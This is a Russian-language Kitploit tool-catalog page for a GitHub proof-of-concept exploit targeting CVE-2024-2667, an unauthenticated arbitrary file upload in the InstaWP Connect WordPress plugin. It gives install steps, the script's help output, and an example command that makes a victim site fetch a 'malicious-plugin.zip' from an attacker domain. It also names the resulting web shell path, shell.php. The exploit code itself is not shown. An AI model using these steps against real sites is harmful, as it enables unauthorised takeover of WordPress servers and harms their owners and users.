Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-2667-Poc — PoC-эксплойт для CVE-2024-2667: автоматизированная загрузка произвольных файлов и доступ к shell через недостаточную проверку файлов в REST API endpoint плагина InstaWP Connect для WordPress. | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-2667-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubnxploited/cve-2024-2667-poc

CVE-2024-2667-Poc

PoC-эксплойт для CVE-2024-2667: автоматизированная загрузка произвольных файлов и доступ к shell через недостаточную проверку файлов в REST API endpoint плагина InstaWP Connect для WordPress.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-2667-Poc 🚀

Описание

Плагин InstaWP Connect – 1-click WP Staging & Migration для WordPress уязвим к произвольной загрузке файлов из-за недостаточной проверки файлов в конечной точке REST API /wp-json/instawp-connect/v1/config во всех версиях вплоть до 0.1.0.22 включительно. Это позволяет неаутентифицированным атакующим загружать произвольные файлы.

Руководство по использованию скрипта ⚙️

Установка зависимостей

ОписаниеДеталиИконка
Установка необходимых библиотекИспользуйте pip для установки необходимых библиотек Python: requests и beautifulsoup4.🛠️
Команда для установкиВыполните: pip install requests beautifulsoup4.📥

Запуск скрипта

Проверка уязвимости

Расположение shell

ОписаниеДеталиИконка
Путь к shellПри успешной загрузке shell будет доступен по адресу:🐚
wp-content/plugins/instawp-connect/shell.php.

использование -help

root@kitploit:~
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

options:
  -h, --help            show this help message and exit
  -up URL_PLUGIN, --url_plugin URL_PLUGIN
                        URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
  -u URL_TARGET, --url_target URL_TARGET
                        URL of the target WordPress site (e.g., http://victim-domain/).
Скачать инструмент
ОписаниеДеталиИконка
Запустите скриптЗапустите скрипт из командной строки с необходимыми аргументами.🚀
Обязательные аргументы- -up: URL плагина (например, http://attacker-domain/malicious-plugin.zip).
- -u: URL целевого сайта WordPress (например, http://victim-domain/).🔧
Пример командыpython CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/📜
ОписаниеДеталиИконка
Проверка версииСкрипт проверяет файл readme.txt на предмет версии целевого плагина.🔍
Уязвимая версияЕсли версия <= 0.1.0.22, скрипт выводит: The site is vulnerable.⚠️
Безопасная версияЕсли версия > 0.1.0.22, скрипт выводит: The site is not vulnerable.✅